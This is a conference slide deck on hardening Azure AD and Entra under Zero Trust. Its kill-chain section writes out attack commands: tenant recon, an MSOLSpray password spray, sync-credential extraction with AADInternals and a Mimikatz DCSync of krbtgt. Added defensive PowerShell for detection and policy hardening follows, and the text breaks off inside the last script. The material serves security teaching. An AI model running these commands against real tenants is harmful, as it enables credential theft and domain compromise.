Thanks to all our partners!
27 October 2022 - PARIS
@IdentityDays #identitydays2022
Jean-François Apréa
CEO and Founder AZ IT Consulting | IT & Cloud Architect | Microsoft Azure Specialist
MVP Security | MVP Cloud and Datacenter Management (16)
Author | Speaker | Trainer (MCT Alumni)
Seyfallah Tagrerout
CEO and Founder STC Consulting | Cloud and Security Architect
Microsoft Azure Specialist | Microsoft Zero Trust Specialist
MVP Azure and Enterprise Mobility (8)
Author | Speaker | Trainer
Apply the Zero Trust model for Hardening your Azure AD
Identity Days 2022
Agenda
Zero Trust? It's urgent to move, because it's urgent to be truly protected!
• Azure AD & Microsoft Entra
• Zero Trust and the Microsoft vision
• Azure AD is identity and access control centric
• Azure AD kill chain
• Azure AD hardening with Zero Trust in mind 😊
• Good practices and a 12-step action plan
It is becoming difficult to stay up to date… and hackers don't give a shit!
Source: Jean-Charles Duret-Ferrari
The bad reasons we hear for not fixing things:
• About your project's scope…
• It's managed by a third party…
• It's a legacy system…
• It's too critical to patch…
• You've always done it that way…
• About your go-live date…
• It's only a pilot/POC, not production…
• About the NDA…
• It was not a mandatory requirement…
• It is a non-exposed internal system…
• It is hard to change…
• It is handled in the cloud…
• The vendor does not support this…
• It is an interim solution…
• It is encrypted on disk…
• You cannot explain the risk to the business…
• You have other priorities…
• You don't have a business justification…
• You cannot show an ROI…
• You contracted out that risk…
Really, too many bad reasons!
Azure AD & Microsoft Entra
Azure Active Directory & Microsoft Entra
Azure Active Directory
• Identity & access management
• Inter-connected ecosystem
• Security
• Hybrid cloud
• Several types of identities
Microsoft Entra (product family)
• Azure Active Directory
• Microsoft Entra Permissions Management
• Microsoft Entra Verified ID
• Microsoft Entra Workload Identities
• Microsoft Entra Identity Governance
About Zero Trust and the Microsoft vision
Microsoft Zero Trust vision: three principles
Assume breach
Assume attackers can and will successfully attack anything (identity, network, device, app, infrastructure, etc.) and plan accordingly. This transforms overall thinking, strategy and architectures from "safe network" to "open network". An asset/node is a user, app, device, data, API, etc.
Verify explicitly
Protect assets against attacker control by explicitly validating that all trust and security decisions use all relevant available information and telemetry. This reduces the attack surface of each asset.
Use least privilege access
Limit the access of a potentially compromised asset, typically with just-in-time and just-enough-access (JIT/JEA) and risk-based policies such as adaptive access control. This reduces the blast radius of a compromise.
Azure AD is identity and access control centric
Azure AD access control plane
• Azure AD signals
• Verification of each access attempt
• Access control to apps and data
Never trust, always verify…
Azure AD Kill Chain ✨😯
Azure AD kill chain: how to get started 😊 (diagram)
Azure AD kill chain: step-by-step progression 😯
1. Azure AD unauthenticated discovery (does the tenant exist, is the domain federated?)
2. Find a valid e-mail account
3. Password spraying attack
4. Switch to an authenticated user session
5. Accounts: list synchronized and cloud-only accounts
6. Azure AD Connect: the cloud sync account Sync_<ServerName>_<guid>@domain.onmicrosoft.com reveals the Azure AD Connect server name; on-premises, the description of the MSOL_<guid> account names the same server
7. From here, by default, everything is possible!
8. As a local administrator on the Azure AD Connect server you can recover the MSOL_ account password: it is stored encrypted in the ADSync SQL database and local admin rights are enough to decrypt it (this is what AADInternals does), or it can be dumped from LSASS.exe with Mimikatz
9. The MSOL_ account holds directory replication rights, so a DCSync attack replicates all the password hashes of the AD domain! 😯
10. Finally, via Active Directory, abuse Seamless SSO: DCSync the key of the AZUREADSSOACC$ computer account and forge Kerberos tickets for any synchronized user; Seamless SSO accepts them, so you reach the Azure portal without ever providing that user's password
So the Azure AD Connect server is a Tier 0 asset and must be hardened accordingly.
Azure AD kill chain: tenant discovery 😯
https://login.microsoftonline.com/getuserrealm.srf?login=[USERNAME@DOMAIN]&xml=1
😯 First information available anonymously, without authentication 😯
About your tenant:
• Active or not?
• Name?
• Federated or not?
Azure AD kill chain: tenant discovery with AADInternals 😯
Discovery and recon of an Azure tenant
Free PowerShell module to install: AADInternals (GitHub - Gerenios/AADInternals: PowerShell module for administering Azure AD and Office 365)
Get tenant name, branding and DNS name:
Get-AADIntLoginInformation -UserName xxxx@domain.onmicrosoft.com
Get tenant ID:
Get-AADIntTenantID -Domain testtenant.onmicrosoft.com
Get all additional domains added:
Get-AADIntTenantDomains -Domain testtenant.onmicrosoft.com
Get general tenant information:
Invoke-AADIntReconAsOutsider -DomainName testtenant.onmicrosoft.com
😯 Third-party PowerShell modules find even more... 😯
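The two discovery slides above both start from the anonymous getuserrealm.srf endpoint. The following is an added example, not code from the slides or from AADInternals: it parses that endpoint's XML answer to tell a managed domain from a federated one, which decides where a password spray will land (Azure AD smart lockout for managed domains, the on-premises STS for federated ones). The two sample responses are constructed with made-up values; the element names follow the live endpoint.

```powershell
# Added example (not from the original slides): parse the anonymous getuserrealm.srf
# answer to tell whether a domain is Managed, Federated or unknown to Azure AD.
# ConvertFrom-RealmXml works offline on the constructed samples below;
# Get-TenantRealmInfo queries the live endpoint with the same parser.

function ConvertFrom-RealmXml {
    param([Parameter(Mandatory)][string]$Xml)
    $info = ([xml]$Xml).RealmInfo
    [pscustomobject]@{
        Domain        = $info.DomainName
        NameSpaceType = $info.NameSpaceType            # Managed, Federated or Unknown
        IsFederated   = ($info.NameSpaceType -eq 'Federated')
        BrandName     = $info.FederationBrandName      # tenant display name when the domain is known
        AuthUrl       = $info.AuthURL                  # on-premises STS (ADFS, ...) when federated
        Success       = ($info.Success -eq 'true')
    }
}

function Get-TenantRealmInfo {
    param([Parameter(Mandatory)][string]$Domain)
    # The login only has to look like a UPN; the user does not need to exist.
    $login = [uri]::EscapeDataString("probe@$Domain")
    $url   = "https://login.microsoftonline.com/getuserrealm.srf?login=$login&xml=1"
    $raw   = (Invoke-WebRequest -Uri $url -UseBasicParsing).Content
    ConvertFrom-RealmXml -Xml $raw
}

# Constructed samples: same element names as the live endpoint, made-up values.
$managedSample = @'
<RealmInfo Success="true"><State>4</State><UserState>1</UserState>
<Login>probe@contoso.example</Login><NameSpaceType>Managed</NameSpaceType>
<DomainName>contoso.example</DomainName><FederationBrandName>Contoso</FederationBrandName>
<CloudInstanceName>microsoftonline.com</CloudInstanceName></RealmInfo>
'@
$federatedSample = @'
<RealmInfo Success="true"><State>3</State><UserState>2</UserState>
<Login>probe@fabrikam.example</Login><NameSpaceType>Federated</NameSpaceType>
<DomainName>fabrikam.example</DomainName><FederationBrandName>Fabrikam</FederationBrandName>
<AuthURL>https://sts.fabrikam.example/adfs/ls/?username=probe%40fabrikam.example&amp;wa=wsignin1.0</AuthURL>
<CloudInstanceName>microsoftonline.com</CloudInstanceName></RealmInfo>
'@

# Offline run: a managed tenant (spray hits Azure AD smart lockout) versus a
# federated one (spray goes to the on-premises STS, where smart lockout does not apply).
ConvertFrom-RealmXml -Xml $managedSample
ConvertFrom-RealmXml -Xml $federatedSample
# Live run (needs Internet access): Get-TenantRealmInfo -Domain contoso.example
```

Defender's note: this request cannot be blocked, it is part of the sign-in protocol. What you can do is make the answer uninteresting: keep federation to a minimum (see the PHS recommendation in the to-do list at the end), and watch the sign-in logs for the spray that usually follows.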
Azure AD kill chain: initial access + password spray / brute force 😯
MSOLSpray tool: https://github.com/dafthack/MSOLSpray
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password 'IdentityDays$Paris%2022'
(the single quotes matter: unquoted, PowerShell would expand $Paris as a variable and spray the wrong password)
Sample password lists are available here: https://github.com/ohmybahgosh/RockYou2021.txt
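The defender's side of the spray shown above, as an added example that is not part of the slides: a detection that groups sign-in failures by source IP, flags an IP that fails against many distinct accounts inside one window, and reports whether the same IP later succeeded (a spray that found a weak password). The sign-in records are constructed; in production, feed it the SigninLogs exported from Azure AD or Log Analytics with the columns renamed to match.

```powershell
# Added example (not from the slides): detect a password spray in sign-in records.
# Input objects need Timestamp, UserPrincipalName, IPAddress and ErrorCode
# (Azure AD ResultType: 0 = success, 50126 = invalid credentials, 50053 = locked).

function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)][object[]]$SignIns,
        [int]$WindowMinutes    = 60,
        [int]$MinDistinctUsers = 5
    )
    $failureCodes = 50126, 50053     # invalid password, account locked by smart lockout
    foreach ($ipGroup in ($SignIns | Group-Object -Property IPAddress)) {
        $events   = @($ipGroup.Group | Sort-Object -Property Timestamp)
        $failures = @($events | Where-Object { $_.ErrorCode -in $failureCodes })
        if ($failures.Count -lt $MinDistinctUsers) { continue }
        # slide a window across the failures from this IP; one alert per IP
        foreach ($first in $failures) {
            $end    = $first.Timestamp.AddMinutes($WindowMinutes)
            $window = @($failures | Where-Object { $_.Timestamp -ge $first.Timestamp -and $_.Timestamp -le $end })
            $users  = @($window | Select-Object -ExpandProperty UserPrincipalName -Unique)
            if ($users.Count -lt $MinDistinctUsers) { continue }
            # did the sprayer get in afterwards? (the account to reset first)
            $hits = @($events | Where-Object { $_.ErrorCode -eq 0 -and $_.Timestamp -ge $first.Timestamp })
            [pscustomobject]@{
                IPAddress     = $ipGroup.Name
                WindowStart   = $first.Timestamp
                DistinctUsers = $users.Count
                Attempts      = $window.Count
                SuccessAfter  = ($hits | Select-Object -ExpandProperty UserPrincipalName -Unique) -join ','
            }
            break
        }
    }
}

# Constructed sign-in records: one IP sprays 8 accounts with a single password and
# then logs in as user8; another IP is a user who mistyped once.
$base   = [datetime]'2022-10-27T08:00:00'
$sample = @(foreach ($n in 1..8) {
    [pscustomobject]@{ Timestamp = $base.AddMinutes($n); UserPrincipalName = "user$n@contoso.example"; IPAddress = '203.0.113.10'; ErrorCode = 50126 }
})
$sample += [pscustomobject]@{ Timestamp = $base.AddMinutes(30); UserPrincipalName = 'user8@contoso.example'; IPAddress = '203.0.113.10'; ErrorCode = 0 }
$sample += [pscustomobject]@{ Timestamp = $base.AddMinutes(5);  UserPrincipalName = 'alice@contoso.example'; IPAddress = '198.51.100.7'; ErrorCode = 50126 }
$sample += [pscustomobject]@{ Timestamp = $base.AddMinutes(6);  UserPrincipalName = 'alice@contoso.example'; IPAddress = '198.51.100.7'; ErrorCode = 0 }

Find-PasswordSpray -SignIns $sample | Format-Table   # one row: 203.0.113.10, 8 users, SuccessAfter = user8@contoso.example
```

Two caveats: a spray against a federated domain never reaches the Azure AD sign-in log (it hits ADFS), so hunt the ADFS audit logs as well; and a patient attacker rotates source IPs, so also group by the user-agent or by the password-failure count per account across all IPs.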
Azure AD kill chain: MFA attacks + MFA fatigue 😯
Phishing & man-in-the-middle: an adversary-in-the-middle proxy such as evilginx (https://github.com/kgretzky/evilginx) relays the real login page and steals the session cookie once the victim has completed MFA.
MFA fatigue: push notifications are sent again and again until the tired user approves one. Example: the breach of Uber's corporate systems, 27/09/2022 (https://veruscorp.com/mfa-fatigue-leads-to-breach-of-ubers-corporate-systems/).
Phishing-resistant MFA with FIDO2 hardware keys such as YubiKey defeats both: there is no push to approve, and the credential is bound to the legitimate origin, so a proxy site cannot replay it. No control is 100% secure, so also protect MFA registration and sessions (see the Conditional Access policies below).
Azure AD kill chain: enumeration 😯
Azure AD PowerShell module (PowerShell Gallery: AzureAD 2.0.2.140; the module has since been deprecated in favour of Microsoft Graph PowerShell, but what a plain user can read has not changed)
Everything below runs with a standard user, without any special privileges!
Install-Module -Name AzureAD
Connect-AzureAD
Session state and details:
Get-AzureADCurrentSessionInfo
Tenant details:
Get-AzureADTenantDetail
List all Azure AD users:
Get-AzureADUser -All $true
Get a specific user's properties:
Get-AzureADUser -ObjectId test@tenanttest.onmicrosoft.com
Find users whose name contains "admin":
Get-AzureADUser -SearchString "admin"
Find groups whose name contains "admin":
Get-AzureADGroup -All $true | ?{$_.DisplayName -match "admin"}
Get all groups synchronized from AD to Azure AD:
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
Get all cloud-only Azure AD groups:
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
Get all users holding the Global Administrator role:
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get all compliant (Intune-managed) devices:
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq $true}
Get all registered apps:
Get-AzureADApplication -All $true
Other useful tools: the Azure portal, PowerShell, the Azure CLI
Warning: by default, an Azure AD user can 😯
• Access the list of all users, groups, applications, devices, roles, subscriptions
• Send invitations to guest accounts
• Create security groups
• Read group members
• Create a new app registration
• Register up to 50 devices in Azure AD
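The defaults listed above live in one tenant-wide object, the authorization policy. The following is an added example, not code from the slides: it audits that policy against a hardened target state and, once the findings are reviewed, applies it through the documented Microsoft Graph v1.0 resource /policies/authorizationPolicy. The audit runs offline on a constructed policy object shaped like a default tenant; the Get-/Set- functions need a caller-supplied bearer token ($AccessToken is an assumption: a token carrying Policy.ReadWrite.Authorization).

```powershell
# Added example (not from the slides): audit, then tighten, the tenant-wide
# authorizationPolicy that hands every member user the default rights above.

$GraphUri = 'https://graph.microsoft.com/v1.0/policies/authorizationPolicy'

# Target state: no self-service app registration, no user-created security groups,
# no directory-wide user reads, invitations limited to admins and guest inviters,
# legacy MSOnline PowerShell blocked.
$Desired = [ordered]@{
    'defaultUserRolePermissions.allowedToCreateApps'           = $false
    'defaultUserRolePermissions.allowedToCreateSecurityGroups' = $false
    'defaultUserRolePermissions.allowedToReadOtherUsers'       = $false
    'allowInvitesFrom'                                         = 'adminsAndGuestInviters'
    'blockMsolPowerShell'                                      = $true
}

function Get-PropertyPath {
    # Walk a dotted path ('a.b.c') through a PSCustomObject returned by ConvertFrom-Json
    param($Object, [string]$Path)
    foreach ($part in $Path.Split('.')) { $Object = $Object.$part }
    return $Object
}

function Test-AuthorizationPolicy {
    # Returns one finding per setting that differs from $Desired (no output = compliant)
    param([Parameter(Mandatory)]$Policy)
    foreach ($key in $Desired.Keys) {
        $current = Get-PropertyPath -Object $Policy -Path $key
        if ($current -ne $Desired[$key]) {
            [pscustomobject]@{ Setting = $key; Current = $current; Expected = $Desired[$key] }
        }
    }
}

function Get-AuthorizationPolicy {
    param([Parameter(Mandatory)][string]$AccessToken)
    Invoke-RestMethod -Method Get -Uri $GraphUri -Headers @{ Authorization = "Bearer $AccessToken" }
}

function Set-AuthorizationPolicy {
    param([Parameter(Mandatory)][string]$AccessToken)
    $body = @{
        defaultUserRolePermissions = @{
            allowedToCreateApps           = $false
            allowedToCreateSecurityGroups = $false
            allowedToReadOtherUsers       = $false
        }
        allowInvitesFrom    = 'adminsAndGuestInviters'
        blockMsolPowerShell = $true
    } | ConvertTo-Json -Depth 5
    Invoke-RestMethod -Method Patch -Uri $GraphUri -ContentType 'application/json' `
        -Headers @{ Authorization = "Bearer $AccessToken" } -Body $body
}

# Constructed policy object with the insecure defaults of a fresh tenant
$sampleTenantPolicy = @'
{ "id": "authorizationPolicy", "allowInvitesFrom": "everyone", "blockMsolPowerShell": false,
  "defaultUserRolePermissions": { "allowedToCreateApps": true, "allowedToCreateSecurityGroups": true,
                                  "allowedToReadOtherUsers": true } }
'@ | ConvertFrom-Json

Test-AuthorizationPolicy -Policy $sampleTenantPolicy | Format-Table   # five findings
# Live: Test-AuthorizationPolicy -Policy (Get-AuthorizationPolicy -AccessToken $token)
#       then, after review, Set-AuthorizationPolicy -AccessToken $token
```

Test before enforcing: allowedToReadOtherUsers = false also affects legitimate people pickers and apps that read the directory on the user's behalf. And note that the portal setting "Restrict access to the Azure AD administration portal" only hides the UI; it does not stop the PowerShell and Graph enumeration shown on this slide, which is why the authorization policy is the control that matters.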
Azure AD kill chain: and finally, use of the MSOL_* credentials 😯
Enumeration via the Active Directory PowerShell module (the account description names the Azure AD Connect server):
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties Description | select SamAccountName,Description | fl
Enumeration via the Azure AD PowerShell module:
Get-AzureADUser -All $true | ?{$_.UserPrincipalName -match "Sync_"}
Once the Azure AD Connect server has been compromised, the credentials are extracted (run locally, as administrator):
Get-AADIntSyncCredentials
The end: MSOL_* account credential + DCSync attack with Mimikatz
runas /netonly /user:amslab.corp\MSOL_782bef6aa0a9 cmd
Invoke-Mimikatz -Command "lsadump::dcsync /user:amsLab\krbtgt /domain:amsLab.corp /dc:DC01.amsLab.corp"
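The DCSync at the end of the kill chain is visible on the domain controllers, and the set of accounts able to perform it is small and auditable. The following is an added example that is not part of the slides: it lists who holds replication rights on the domain root, and flags 4662 events where a replication right is exercised by anything other than a domain controller, or by the Azure AD Connect sync account from a host other than the Azure AD Connect server (password hash sync uses exactly these rights, so the MSOL_ account replicating from its own server is normal; from a workstation it is the attack above). The 4662 records are constructed; the SourceHost field is an assumption filled by correlating SubjectLogonId with the matching 4624 logon, which is left to the caller.

```powershell
# Added example (not from the slides): who can DCSync, and who just did.
# The three control-access rights that allow replication (well-known GUIDs):
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-ReplicationRightHolders {
    # Who can DCSync at all: ACEs on the domain root that grant a replication right (live, needs RSAT)
    Import-Module ActiveDirectory
    $dn = (Get-ADDomain).DistinguishedName
    (Get-Acl -Path "AD:\$dn").Access |
        Where-Object { $ReplicationRights.ContainsKey($_.ObjectType.ToString()) } |
        Select-Object IdentityReference, @{ n = 'Right'; e = { $ReplicationRights[$_.ObjectType.ToString()] } }
}

function ConvertFrom-Event4662 {
    # Flatten a live Get-WinEvent 4662 record. SourceHost is not in 4662: correlate
    # SubjectLogonId with the matching 4624 logon to fill it (assumption, caller's job).
    param([Parameter(Mandatory)]$Event)
    $data = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        TimeCreated = $Event.TimeCreated; SubjectUserName = $data['SubjectUserName']
        SubjectDomainName = $data['SubjectDomainName']; Properties = $data['Properties']
        SubjectLogonId = $data['SubjectLogonId']; SourceHost = $null
    }
}

function Find-DcSync {
    param(
        [Parameter(Mandatory)][object[]]$Events,
        [string[]]$DomainControllers,               # computer accounts allowed to replicate, e.g. 'DC01$'
        [hashtable]$AllowedServiceAccounts = @{}    # account -> the only host it may replicate from
    )
    foreach ($e in $Events) {
        $rights = @($ReplicationRights.Keys | Where-Object { $e.Properties -match $_ } | ForEach-Object { $ReplicationRights[$_] })
        if ($rights.Count -eq 0) { continue }                          # not a replication request
        $acct = $e.SubjectUserName
        if ($acct -in $DomainControllers) { continue }                 # DC-to-DC replication
        if ($AllowedServiceAccounts.ContainsKey($acct) -and $e.SourceHost -eq $AllowedServiceAccounts[$acct]) { continue }
        $reason = if ($AllowedServiceAccounts.ContainsKey($acct)) { 'known sync account used from an unexpected host' }
                  else { 'account should never replicate' }
        [pscustomobject]@{
            TimeCreated = $e.TimeCreated; Account = "$($e.SubjectDomainName)\$acct"
            SourceHost = $e.SourceHost; Rights = ($rights -join ', '); Reason = $reason
        }
    }
}

# Constructed events (values made up): the kill chain above as seen from the DC.
$t = [datetime]'2022-10-27T10:00:00'
$sample = @(
    [pscustomobject]@{ TimeCreated = $t;               SubjectUserName = 'DC02$';             SubjectDomainName = 'AMSLAB'; SourceHost = 'DC02';    Properties = '{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' },
    [pscustomobject]@{ TimeCreated = $t.AddMinutes(1); SubjectUserName = 'MSOL_782bef6aa0a9'; SubjectDomainName = 'AMSLAB'; SourceHost = 'AADC01';  Properties = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' },
    [pscustomobject]@{ TimeCreated = $t.AddMinutes(2); SubjectUserName = 'MSOL_782bef6aa0a9'; SubjectDomainName = 'AMSLAB'; SourceHost = 'WKS-042'; Properties = '{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' },
    [pscustomobject]@{ TimeCreated = $t.AddMinutes(3); SubjectUserName = 'jdoe';              SubjectDomainName = 'AMSLAB'; SourceHost = 'WKS-042'; Properties = '{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}' },
    [pscustomobject]@{ TimeCreated = $t.AddMinutes(4); SubjectUserName = 'jdoe';              SubjectDomainName = 'AMSLAB'; SourceHost = 'WKS-042'; Properties = '{bf967a86-0de6-11d0-a285-00aa003049e2}' }  # not a replication right
)
Find-DcSync -Events $sample -DomainControllers 'DC01$', 'DC02$' -AllowedServiceAccounts @{ 'MSOL_782bef6aa0a9' = 'AADC01' } | Format-Table
# Expected: two rows, the MSOL_ account from WKS-042 and jdoe from WKS-042.
# Live: Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662 } | ForEach-Object { ConvertFrom-Event4662 $_ } | Find-DcSync ...
```

Prerequisite: 4662 is only written when the "Audit Directory Service Access" subcategory is enabled and the domain root carries a SACL covering control-access rights. Microsoft Defender for Identity (Part 4 below) raises the same "suspected DCSync" alert without this plumbing, but the ACL review in Get-ReplicationRightHolders is worth running either way: anything beyond the DC accounts, the Azure AD Connect account and the built-in admin groups is a finding.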
Azure AD Hardening ✨👍
Inspired by Microsoft Entra, based on customer experience:
• Security projects
• Assessment / audit missions
• Emergency operations
• Remediation
Always start with the Azure AD quick wins 👍
Part 1: Enforce your secrets
1. Use Microsoft Secure Score
• Deploy MFA for EVERYONE
• Enable Identity Protection (Azure AD P2)
2. Use Azure AD Smart Lockout
• For Azure AD cloud accounts
• For hybrid accounts (set the on-premises AD lockout threshold above the Azure AD one, so Azure AD locks out first)
3. Deploy passwordless authentication
• FIDO2 keys
• Microsoft Authenticator
4. Create TWO recovery (break-glass) accounts
• Cloud-only, in Azure AD
• Never synchronized from on-premises
• No MFA and no FIDO2 keys, so they still work if MFA or federation is down; exclude them from Conditional Access policies for the same reason
• Password expiration disabled (long random password, kept offline)
• Strong audit on these two accounts: alert on every sign-in with Azure Log Analytics, Microsoft Sentinel and Defender for Cloud Apps (formerly MCAS)
Part 1 (continued): Hardening Azure MFA
1. MFA protection
2. Authentication strengths
3. MFA fraud alert
4. Identity Protection
Part 2: Conditional Access design
Scope audience:
• Regular users
• High-privilege users
• Guest / external users
• Workload identities
Logical separation of policies in Azure AD brings:
• Flexibility
• Granularity
• Lower risk of error
• More readability
• Easier troubleshooting
• Governance
Part 2 (continued): Conditional Access design
Best practices: always test the behaviour first, with the What If tool and report-only mode.
Authentication policies
- Enforce MFA for all administrators
- Enforce MFA for all standard users
- Enforce MFA for all guest users
- Block legacy authentication
- Reduce the attack surface
Device access policies
- Block unsupported device platforms
- Require managed devices (Endpoint Manager) for admin stations
- Require approved apps for mobile access (MAM)
- Require managed devices
- Specific Conditional Access for macOS (if needed)
Strict security policies
- Block MFA registration from untrusted locations
- Require terms of use for all administrators / guest access / consultants
- Control sign-in frequency
- Disable persistent browser sessions
- Block foreign locations
- Require a trusted location for all admins
- User-risk and sign-in-risk based policies (via Identity Protection)
- Authentication context for PIM, MIP-labelled SharePoint sites, and Defender for Cloud Apps upload and download control
- Privileged access via device filters
- Conditional Access for workload identities
- Block all cloud apps except Teams / SPO for guest access
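Two of the policies above, written as Microsoft Graph v1.0 /identity/conditionalAccess/policies payloads, as an added example that is not part of the slides. Both are created in report-only mode first (the "always test" rule), and a guard refuses any policy that does not exclude the break-glass accounts from Part 1, the most common way to lock every administrator out of the tenant. The role template IDs are Azure AD's built-in ones; the break-glass object IDs and $AccessToken (a token holding Policy.ReadWrite.ConditionalAccess) are placeholders.

```powershell
# Added example (not from the slides): Conditional Access policies as Graph payloads,
# report-only first, with a break-glass exclusion guard.

$BreakGlassIds = @('11111111-1111-1111-1111-111111111111', '22222222-2222-2222-2222-222222222222')  # placeholders
$AdminRoleIds  = @(
    '62e90394-69f5-4237-9190-012177145e10',   # Global Administrator (role template ID)
    'e8611ab8-c189-46e8-94e1-60213ab1f814',   # Privileged Role Administrator
    '194ae4cb-b126-40b2-bd5b-6091b380977d',   # Security Administrator
    '9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3'    # Application Administrator
)

function New-BlockLegacyAuthPolicy {
    param([string[]]$ExcludeUsers)
    @{
        displayName   = 'CA001 - Block legacy authentication'
        state         = 'enabledForReportingButNotEnforced'      # report-only until the sign-in report is clean, then 'enabled'
        conditions    = @{
            users          = @{ includeUsers = @('All'); excludeUsers = $ExcludeUsers }
            applications   = @{ includeApplications = @('All') }
            clientAppTypes = @('exchangeActiveSync', 'other')   # legacy protocols only; modern clients untouched
        }
        grantControls = @{ operator = 'OR'; builtInControls = @('block') }
    }
}

function New-AdminMfaPolicy {
    param([string[]]$RoleIds, [string[]]$ExcludeUsers)
    @{
        displayName   = 'CA002 - Require MFA for privileged roles'
        state         = 'enabledForReportingButNotEnforced'
        conditions    = @{
            users          = @{ includeRoles = $RoleIds; excludeUsers = $ExcludeUsers }
            applications   = @{ includeApplications = @('All') }
            clientAppTypes = @('all')
        }
        grantControls = @{ operator = 'OR'; builtInControls = @('mfa') }
    }
}

function Test-BreakGlassExcluded {
    # $true only when every break-glass account is in the policy's exclusion list
    param([Parameter(Mandatory)][hashtable]$Policy, [Parameter(Mandatory)][string[]]$BreakGlassIds)
    $excluded = @($Policy.conditions.users.excludeUsers)
    $missing  = @($BreakGlassIds | Where-Object { $_ -notin $excluded })
    return ($missing.Count -eq 0)
}

function Publish-CaPolicy {
    param([Parameter(Mandatory)][hashtable]$Policy, [Parameter(Mandatory)][string]$AccessToken)
    if (-not (Test-BreakGlassExcluded -Policy $Policy -BreakGlassIds $BreakGlassIds)) {
        throw "Refusing to create '$($Policy.displayName)': break-glass accounts are not excluded"
    }
    Invoke-RestMethod -Method Post -Uri 'https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies' `
        -Headers @{ Authorization = "Bearer $AccessToken" } -ContentType 'application/json' `
        -Body ($Policy | ConvertTo-Json -Depth 10)
}

# Offline check of the guard
$good = New-AdminMfaPolicy -RoleIds $AdminRoleIds -ExcludeUsers $BreakGlassIds
$bad  = New-AdminMfaPolicy -RoleIds $AdminRoleIds -ExcludeUsers @()
Test-BreakGlassExcluded -Policy $good -BreakGlassIds $BreakGlassIds   # True
Test-BreakGlassExcluded -Policy $bad  -BreakGlassIds $BreakGlassIds   # False: would lock admins out when MFA is unavailable
New-BlockLegacyAuthPolicy -ExcludeUsers $BreakGlassIds | ConvertTo-Json -Depth 10   # the payload Publish-CaPolicy would send
```

Leave CA001 in report-only for a few weeks and read the sign-in log's "report-only" column: every legacy-auth hit is a printer, a scanner or a service account that must be migrated before the policy is switched to enabled.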
Part 3: Use PIM (Privileged Identity Management, Azure AD P2)
PIM best practices
• Enable PIM for privileged accounts
• Enable PIM for all admin roles (Zero Trust)
• Require MFA on activation of each role
• For Global Administrator, allow 2 hours of activation at most (Zero Trust)
• Review the default assignment duration: partner accounts often end up with permanent assignments
• Configure e-mail notifications to track activations
• Configure weekly access reviews for PIM
• Use PIM for privileged access groups
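An audit for the two PIM rules above that are easiest to verify from data, as an added example that is not part of the slides: nobody should hold a permanent active assignment in a privileged role except the break-glass accounts, and no activation should exceed the allowed window (2 hours for Global Administrator here). The record shape follows the Graph v1.0 roleManagement/directory/roleAssignmentScheduleInstances resource; the records below are constructed, and the live call assumes a token with RoleManagement.Read.Directory.

```powershell
# Added example (not from the slides): find standing privilege and over-long activations.

$GlobalAdminRoleId = '62e90394-69f5-4237-9190-012177145e10'   # role template ID

function Get-RoleAssignmentInstances {
    param([Parameter(Mandatory)][string]$AccessToken, [string]$RoleDefinitionId = $GlobalAdminRoleId)
    $uri = 'https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleInstances' +
           "?`$filter=roleDefinitionId eq '$RoleDefinitionId'"
    $all = @()
    do {
        $page = Invoke-RestMethod -Method Get -Uri $uri -Headers @{ Authorization = "Bearer $AccessToken" }
        $all += $page.value
        $uri  = $page.'@odata.nextLink'     # follow paging until exhausted
    } while ($uri)
    $all
}

function Test-PrivilegedAssignments {
    param(
        [Parameter(Mandatory)][object[]]$Instances,   # principalId, assignmentType, memberType, startDateTime, endDateTime
        [string[]]$BreakGlassIds = @(),
        [int]$MaxActivationHours = 2
    )
    foreach ($i in $Instances) {
        $permanent = [string]::IsNullOrEmpty($i.endDateTime)
        if ($i.assignmentType -eq 'Assigned' -and $permanent -and $i.principalId -notin $BreakGlassIds) {
            [pscustomobject]@{ Principal = $i.principalId; MemberType = $i.memberType
                               Finding = 'Permanent active assignment: convert to PIM eligible' }
        }
        elseif ($i.assignmentType -eq 'Activated' -and -not $permanent) {
            $hours = ([datetime]$i.endDateTime - [datetime]$i.startDateTime).TotalHours
            if ($hours -gt $MaxActivationHours) {
                [pscustomobject]@{ Principal = $i.principalId; MemberType = $i.memberType
                                   Finding = "Activation of $([math]::Round($hours, 1)) h exceeds $MaxActivationHours h: lower the role's maximum activation duration" }
            }
        }
    }
}

# Constructed instances: a break-glass account (permanent, expected), a standing admin
# (finding), a compliant 2 h activation, and an 8 h activation through a group (finding).
$bg = 'bbbbbbbb-0000-0000-0000-000000000001'
$sample = @(
    [pscustomobject]@{ principalId = $bg;                                    assignmentType = 'Assigned';  memberType = 'Direct'; startDateTime = '2022-01-01T00:00:00Z'; endDateTime = $null },
    [pscustomobject]@{ principalId = 'aaaaaaaa-0000-0000-0000-000000000002'; assignmentType = 'Assigned';  memberType = 'Direct'; startDateTime = '2022-01-01T00:00:00Z'; endDateTime = $null },
    [pscustomobject]@{ principalId = 'aaaaaaaa-0000-0000-0000-000000000003'; assignmentType = 'Activated'; memberType = 'Direct'; startDateTime = '2022-10-27T08:00:00Z'; endDateTime = '2022-10-27T10:00:00Z' },
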